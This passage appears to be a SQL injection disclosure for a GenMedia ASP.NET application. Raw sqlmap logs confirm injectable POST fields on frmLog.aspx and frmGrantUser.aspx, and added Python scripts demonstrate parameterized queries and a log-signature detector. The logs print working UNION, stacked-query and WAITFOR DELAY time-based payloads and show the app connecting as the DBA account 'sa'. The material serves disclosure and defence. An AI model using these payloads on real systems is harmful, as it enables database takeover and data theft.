[01:52:41] [INFO] fetching current database
[01:52:41] [INFO] retrieving the length of query output
[01:52:41] [INFO] retrieved: 8
[01:53:10] [INFO] retrieved: GenMedia
current database: 'GenMedia'
[01:53:10] [INFO] testing if current user is DBA
current user is DBA: True
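The sqlmap output above shows why the boolean-based blind payload works: the UserName value is concatenated into the query, and the leading `1%'` closes what is evidently a `LIKE '%...%'` pattern (an inference from the payload, not something the report states). The following Python script is an added example, not code from the report or from the affected GenMedia application. It models that search against an in-memory SQLite table with invented users (the real back end is SQL Server, and the LIKE-based query shape is an assumption) and contrasts the concatenated query with a parameterized one, using the exact tautology sqlmap reported and its false counterpart as the oracle.

```python
import sqlite3

# Constructed sample data standing in for the application's user table.
# Names and addresses are invented; nothing here comes from the target system.
SAMPLE_USERS = [
    ("admin1", "admin1@example.invalid"),
    ("alice", "alice@example.invalid"),
    ("bob", "bob@example.invalid"),
]

# The boolean-based blind payload sqlmap reported for the UserName field,
# and the same payload with the condition made false. The pair is the oracle:
# if the two responses differ, the condition was evaluated by the database.
TAUTOLOGY = "1%' AND 7285=7285 AND '%'='"
CONTRADICTION = "1%' AND 7285=7286 AND '%'='"


def make_db():
    """Create the in-memory table (assumed schema: UserName, Email)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Email TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, user_name):
    """String concatenation: the caller's text becomes part of the SQL grammar.
    With TAUTOLOGY the statement becomes
      ... WHERE UserName LIKE '%1%' AND 7285=7285 AND '%'='%'
    and the injected conditions decide what is returned."""
    sql = ("SELECT UserName, Email FROM Users WHERE UserName LIKE '%"
           + user_name + "%'")
    return conn.execute(sql).fetchall()


def search_parameterized(conn, user_name):
    """Bound parameter: the caller's text is only ever a string value, so the
    quote and the AND clauses are searched for literally and never parsed."""
    sql = "SELECT UserName, Email FROM Users WHERE UserName LIKE ?"
    return conn.execute(sql, ("%" + user_name + "%",)).fetchall()


def blind_oracle_differs(search_fn, conn):
    """True when the truth value of the injected condition changes the result
    set, which is exactly the signal sqlmap's boolean-based blind test looks for."""
    return search_fn(conn, TAUTOLOGY) != search_fn(conn, CONTRADICTION)


if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__)
        print("  normal search 'admin':", fn(db, "admin"))
        print("  true condition:       ", fn(db, TAUTOLOGY))
        print("  false condition:      ", fn(db, CONTRADICTION))
        print("  oracle observable:    ", blind_oracle_differs(fn, db))
```

Only the boolean oracle is reproduced here: SQLite's execute() refuses a second statement, so the `; WAITFOR DELAY` stacked-query and time-based payloads from the report have no equivalent in this model. On SQL Server they ride on the same concatenation, and binding parameters removes all three families at once. Binding parameters does not address the other finding in the report: the application connects as `sa` (current user is DBA: True), so any residual injection or a leaked connection string yields full server control, which is what the os-shell screenshots illustrate. A dedicated login holding only the rights the application needs limits what a single bug can reach.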


3.
Back end, second location: UserName, LogStartTime and LogStopTime are all injectable

**.**.**.**:65493/genmedia/Modules/frmLog.aspx (POST)
__VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwIEAgUCBhYHEAUG5YWo6YOoBQEwZ
xAFBueZu
%2BW9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxAFBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L
%2Bu5pS5BQE3Z2RkAg0PPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxidG5TZWFyY2hMb2cFB0xvZ0
xpc3QPZ2QJDaHPO320ZPwp9iHOycj8MGLw1A%3D
%3D&__EVENTVALIDATION=/wEWDALkzqfhBwKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWFCAK70JWFCAKvruq
2CAKRy6SwBQKgo4TOAwLotbXQCVaqz
%2B5Nhf1%2BJDcUkvbZGdreW2xy&comboLogType=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015
-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15


[01:56:16] [INFO] target URL is stable
[01:56:16] [INFO] ignoring POST parameter '__VIEWSTATE'
[01:56:16] [INFO] ignoring POST parameter '__EVENTVALIDATION'
[01:56:16] [INFO] testing if POST parameter 'comboLogType' is dynamic
[01:56:16] [INFO] confirming that POST parameter 'comboLogType' is dynamic
[01:56:17] [WARNING] POST parameter 'comboLogType' does not appear dynamic
[01:56:17] [WARNING] heuristic (basic) test shows that POST parameter 'comboLogT
ype' might not be injectable
[01:56:17] [INFO] testing for SQL injection on POST parameter 'comboLogType'
[01:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:56:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:56:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:56:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:56:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:56:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:56:33] [WARNING] POST parameter 'comboLogType' is not injectable
[01:56:33] [INFO] testing if POST parameter 'UserName' is dynamic
[01:56:33] [WARNING] POST parameter 'UserName' does not appear dynamic
[01:56:33] [WARNING] heuristic (basic) test shows that POST parameter 'UserName'
might not be injectable
[01:56:33] [INFO] testing for SQL injection on POST parameter 'UserName'
[01:56:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:56:33] [WARNING] reflective value(s) found and filtering out
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:56:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:56:47] [INFO] POST parameter 'UserName' seems to be 'Microsoft SQL Server/Sy
base stacked queries' injectable
[01:56:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:56:57] [INFO] POST parameter 'UserName' seems to be 'Microsoft SQL Server/Sy
base time-based blind' injectable
[01:56:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:56:57] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[01:56:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:56:58] [INFO] target URL appears to have 7 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[01:57:05] [WARNING] output with limited number of rows detected. Switching to p
artial mode
[01:57:05] [INFO] POST parameter 'UserName' is 'Generic UNION query (NULL) - 1 t
o 20 columns' injectable
POST parameter 'UserName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[01:57:23] [INFO] testing if POST parameter 'LogStartTime' is dynamic
[01:57:23] [WARNING] POST parameter 'LogStartTime' does not appear dynamic
[01:57:23] [WARNING] heuristic (basic) test shows that POST parameter 'LogStartT
ime' might not be injectable
[01:57:23] [INFO] testing for SQL injection on POST parameter 'LogStartTime'
[01:57:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:57:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:57:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:57:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:57:38] [INFO] POST parameter 'LogStartTime' seems to be 'Microsoft SQL Serve
r/Sybase stacked queries' injectable
[01:57:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:57:48] [INFO] POST parameter 'LogStartTime' seems to be 'Microsoft SQL Serve
r/Sybase time-based blind' injectable
[01:57:48] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
[01:57:50] [INFO] checking if the injection point on POST parameter 'LogStartTim
e' is a false positive
POST parameter 'LogStartTime' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] y
[01:58:05] [INFO] testing if POST parameter 'LogStopTime' is dynamic
[01:58:05] [WARNING] POST parameter 'LogStopTime' does not appear dynamic
[01:58:05] [WARNING] heuristic (basic) test shows that POST parameter 'LogStopTi
me' might not be injectable
[01:58:05] [INFO] testing for SQL injection on POST parameter 'LogStopTime'
[01:58:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:58:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:58:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:58:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:58:18] [INFO] POST parameter 'LogStopTime' seems to be 'Microsoft SQL Server
/Sybase stacked queries' injectable
[01:58:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:58:28] [INFO] POST parameter 'LogStopTime' seems to be 'Microsoft SQL Server
/Sybase time-based blind' injectable
[01:58:28] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
[01:58:29] [WARNING] output with limited number of rows detected. Switching to p
artial mode
[01:58:29] [INFO] POST parameter 'LogStopTime' is 'Generic UNION query (95) - 1
to 20 columns' injectable
POST parameter 'LogStopTime' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] n
sqlmap identified the following injection points with a total of 239 HTTP(s) req
uests:
---
Place: POST
Parameter: UserName
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1' UNION ALL SELECT 95,95,95,95,95,95,CHAR(113) CHAR(112) CHAR(115)
CHAR(100) CHAR(113) CHAR(82) CHAR(111) CHAR(73) CHAR(87) CHAR(105) CHAR(111) CH
AR(74) CHAR(72) CHAR(77) CHAR(114) CHAR(113) CHAR(118) CHAR(117) CHAR(122) CHAR(
113)-- &LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59&btnSearch
Log.x=19&btnSearchLog.y=15
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1'; WAITFOR DELAY '0:0:5'--&LogStartTime=2015-08-05 1:45:53&LogStop
Time=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1' WAITFOR DELAY '0:0:5'--&LogStartTime=2015-08-05 1:45:53&LogStopT
ime=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Place: POST
Parameter: LogStartTime
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53'; WAITFOR DELAY '0:0:5'--&LogStop
Time=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53' WAITFOR DELAY '0:0:5'--&LogStopT
ime=2015-08-12 1:45:59&btnSearchLog.x=19&btnSearchLog.y=15
Place: POST
Parameter: LogStopTime
Type: UNION query
Title: Generic UNION query (95) - 7 columns
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59' U
NION ALL SELECT 95,95,95,95,95,95,CHAR(113) CHAR(112) CHAR(115) CHAR(100) CHAR(1
13) CHAR(106) CHAR(83) CHAR(66) CHAR(80) CHAR(77) CHAR(110) CHAR(118) CHAR(107)
CHAR(86) CHAR(78) CHAR(113) CHAR(118) CHAR(117) CHAR(122) CHAR(113)-- &btnSearch
Log.x=19&btnSearchLog.y=15
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59';
WAITFOR DELAY '0:0:5'--&btnSearchLog.x=19&btnSearchLog.y=15
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzM0NDAyODI0D2QWAgIDD2QWBAIDDxBkDxYHZgIBAgICAwI
EAgUCBhYHEAUG5YWo6YOoBQEwZxAFBueZu W9lQUBMWcQBQbpgIDlh7oFATJnEAUG6KeC55yLBQEzZxA
FBuaWsOWingUBNWcQBQbliKDpmaQFATZnEAUG5L u5pS5BQE3Z2RkAg0PPCsADQEADxYEHgtfIURhdGF
Cb3VuZGceC18hSXRlbUNvdW50ZmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQx
idG5TZWFyY2hMb2cFB0xvZ0xpc3QPPCsACgIGFQEFTG9nSUQIZmTzfRIY0fpJEtYhJ9OEpagqSgPUYA=
=&__EVENTVALIDATION=/wEWDAL60Of/BgKi0JWFCAK90JWFCAK80JWFCAK/0JWFCAK50JWFCAK40JWF
CAK70JWFCAKvruq2CAKRy6SwBQKgo4TOAwLotbXQCdXs2XQpzXg/xdeUlPFzhURR/ZQr&comboLogTyp
e=0&UserName=1&LogStartTime=2015-08-05 1:45:53&LogStopTime=2015-08-12 1:45:59' W
AITFOR DELAY '0:0:5'--&btnSearchLog.x=19&btnSearchLog.y=15
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: UserName, type: Single quoted string (default)
[1] place: POST, parameter: LogStartTime, type: Single quoted string
[2] place: POST, parameter: LogStopTime, type: Single quoted string
[q] Quit
> 1
[01:59:09] [INFO] testing Microsoft SQL Server
[01:59:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[01:59:24] [INFO] confirming Microsoft SQL Server
[01:59:35] [INFO] adjusting time delay to 3 seconds due to good response times
[01:59:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[01:59:35] [INFO] fetching current user
[01:59:35] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[01:59:35] [INFO] retrieved: sa
current user: 'sa'
[02:00:04] [INFO] fetching current database
[02:00:04] [INFO] retrieved: GenMedia
current database: 'GenMedia'
[02:01:32] [INFO] testing if current user is DBA
current user is DBA: True
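Sections 2 and 3 above list the payload families sqlmap confirmed against frmUser.aspx and frmLog.aspx: boolean-based probes (`AND 7285=7285`), stacked and time-based queries (`; WAITFOR DELAY '0:0:5'--`), and UNION queries carrying a CHAR()-encoded marker string. The Python script below is an added example, not part of the report and not a GenMedia component. It scans a constructed log of POST request bodies (the log format, timestamps and field values are invented to mirror the report's requests; IIS does not record request bodies by default, so a reverse proxy or WAF would have to capture them) and flags every form field that carries one of those families after URL decoding.

```python
import re
from urllib.parse import parse_qs

# Payload families sqlmap reported against this back end, as (label, regex).
# Matching runs on the URL-decoded value of every form field, so %27 for the
# quote or + for the space does not hide anything from the patterns.
SIGNATURES = [
    ("waitfor_delay",    re.compile(r"\bWAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I)),
    ("union_select",     re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("char_chain",       re.compile(r"(?:CHAR\(\d{1,3}\)\s*\+?\s*){3,}", re.I)),
    # Both halves of a boolean-based probe (n=n and n=m) are attack traffic,
    # so any "AND <number>=<number>" is flagged, not only the tautology.
    ("boolean_probe",    re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I)),
    ("quote_terminator", re.compile(r"'\s*(?:--|;)")),
]

# Constructed log lines: "<date> <time> <method> <path> <url-encoded body>".
# Paths are the ones named in the report; every value is invented.
SAMPLE_REQUESTS = [
    # Legitimate user search (benign).
    "2015-09-03 01:50:02 POST /genmedia/Modules/frmUser.aspx "
    "UserName=zhang&comboStatus=0&comboOnline=0",
    # Boolean-based blind probe in the shape sqlmap reported.
    "2015-09-03 01:52:32 POST /genmedia/Modules/frmUser.aspx "
    "UserName=1%25%27+AND+7285%3D7285+AND+%27%25%27%3D%27&comboStatus=0",
    # Stacked-query / time-based probe.
    "2015-09-03 01:56:47 POST /genmedia/Modules/frmLog.aspx "
    "comboLogType=0&UserName=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--"
    "&LogStartTime=2015-08-05+1%3A45%3A53",
    # UNION probe carrying a CHAR()-encoded marker string.
    "2015-09-03 01:57:05 POST /genmedia/Modules/frmLog.aspx "
    "UserName=1%27+UNION+ALL+SELECT+95%2C95%2C95%2C95%2C95%2C95%2C"
    "CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28115%29--+"
    "&LogStartTime=2015-08-05+1%3A45%3A53",
    # Legitimate log search with date fields (benign; contains '=' and ':').
    "2015-09-03 02:10:11 POST /genmedia/Modules/frmLog.aspx "
    "comboLogType=0&UserName=&LogStartTime=2015-08-05+1%3A45%3A53"
    "&LogStopTime=2015-08-12+1%3A45%3A59",
]


def classify_value(value):
    """Return the labels of every signature that fires on one decoded value."""
    return [label for label, rx in SIGNATURES if rx.search(value)]


def scan_request(line):
    """Parse one log line and return one alert per suspicious form field."""
    date, time, method, path, body = line.split(" ", 4)
    fields = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
    alerts = []
    for name, values in fields.items():
        for value in values:
            hits = classify_value(value)
            if hits:
                alerts.append({"time": f"{date} {time}", "method": method,
                               "path": path, "param": name, "hits": hits})
    return alerts


def scan_log(lines):
    """Scan a whole log and return the alerts in log order."""
    alerts = []
    for line in lines:
        alerts.extend(scan_request(line))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_REQUESTS):
        print(f"{alert['time']} {alert['path']} param={alert['param']} "
              f"hits={','.join(alert['hits'])}")
```

Signature matching of this kind catches the default sqlmap payloads, not a hand-tuned injection, so it is an alerting aid rather than a substitute for the parameterized queries that remove the bug; a burst of `WAITFOR DELAY` values with rising delays, or `UNION ALL SELECT` with a growing column count, is also a clear marker of a scanner enumerating the query, which is worth alerting on in its own right.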


4. Back end, third location: txtSearchUser is injectable

**.**.**.**:65493/genmedia/Modules/frmGrantUser.aspx (POST)
__VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEGRkFgBkAgkPEA8WBh4NRGF0YVRleHRGaWVsZAUOTW
9kdWxlVHlwZU5hbWUeDkRhdGFWYWx1ZUZpZWxkBQxNb2R1bGVUeXBlSUQeC18hRGF0YUJvdW5kZ2QQFQUM55u05pKt566h
55CGDOeCueaSreeuoeeQhgzmnYPpmZDnrqHnkIYM57O757uf566h55CGDOeUqOaIt
%2BeuoeeQhhUFATUBNAEzATIBMRQrAwVnZ2dnZxYBZmQCCw88KwANAGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0
tleV9fFgEFDWJ0blNlYXJjaFVzZXIFCk1vZHVsZUxpc3QPZ2RGxSmyFc5rb8p60jvkI//fGKdA8w%3D
%3D&__EVENTVALIDATION=/wEWCALDqab1DAL3%2B7WiDgLIvLpRAt78kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCWlS4QVL
sqkypUtI9hSb9sStxkHI%3D&txtSearchUser=12&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4


[02:03:45] [INFO] testing if POST parameter 'txtSearchUser' is dynamic
[02:03:45] [INFO] confirming that POST parameter 'txtSearchUser' is dynamic
[02:03:45] [INFO] POST parameter 'txtSearchUser' is dynamic
[02:03:45] [WARNING] reflective value(s) found and filtering out
[02:03:45] [WARNING] heuristic (basic) test shows that POST parameter 'txtSearch
User' might not be injectable
[02:03:45] [INFO] testing for SQL injection on POST parameter 'txtSearchUser'
[02:03:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:03:47] [INFO] POST parameter 'txtSearchUser' seems to be 'AND boolean-based
blind - WHERE or HAVING clause' injectable
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:03:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:03:57] [INFO] POST parameter 'txtSearchUser' seems to be 'Microsoft SQL Serv
er/Sybase stacked queries' injectable
[02:03:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:04:08] [INFO] POST parameter 'txtSearchUser' seems to be 'Microsoft SQL Serv
er/Sybase time-based blind' injectable
[02:04:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:04:08] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[02:04:08] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[02:04:09] [INFO] target URL appears to have 12 columns in query
[02:04:10] [INFO] POST parameter 'txtSearchUser' is 'Generic UNION query (NULL)
- 1 to 20 columns' injectable
POST parameter 'txtSearchUser' is vulnerable. Do you want to keep testing the ot
hers (if any)? [y/N] y
[02:04:18] [INFO] testing if POST parameter 'ModuleTypeList' is dynamic
[02:04:18] [INFO] confirming that POST parameter 'ModuleTypeList' is dynamic
[02:04:18] [INFO] POST parameter 'ModuleTypeList' is dynamic
[02:04:19] [WARNING] heuristic (basic) test shows that POST parameter 'ModuleTyp
eList' might not be injectable
[02:04:19] [INFO] testing for SQL injection on POST parameter 'ModuleTypeList'
[02:04:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[02:04:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:04:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[02:04:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[02:04:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[02:04:58] [WARNING] POST parameter 'ModuleTypeList' is not injectable
[02:04:58] [INFO] testing if POST parameter 'btnSearchUser.x' is dynamic
[02:04:58] [WARNING] POST parameter 'btnSearchUser.x' does not appear dynamic
[02:04:58] [WARNING] heuristic (basic) test shows that POST parameter 'btnSearch
User.x' might not be injectable
